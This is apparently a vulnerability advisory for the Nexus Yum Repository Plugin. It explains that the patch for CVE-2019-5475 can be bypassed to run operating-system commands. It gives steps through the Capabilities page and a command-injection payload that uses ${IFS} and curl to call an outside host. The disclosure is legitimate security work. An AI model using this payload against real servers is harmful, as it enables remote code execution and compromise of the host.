groupId: org.sonatype.nexus.pluginsartifactId:nexus-yum-repository-pluginversion: 2.14.14-01
The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability.
Take a look at the patch for CVE-2019-5475
The getCleanCommand
method is not completely filtered and can still be bypassed.
Navigate to “Capabilities” in Nexus Repository Manager.
Edit or create a new Yum: Configuration capability
Set path of “createrepo” or “mergerepo” to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo
)
An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.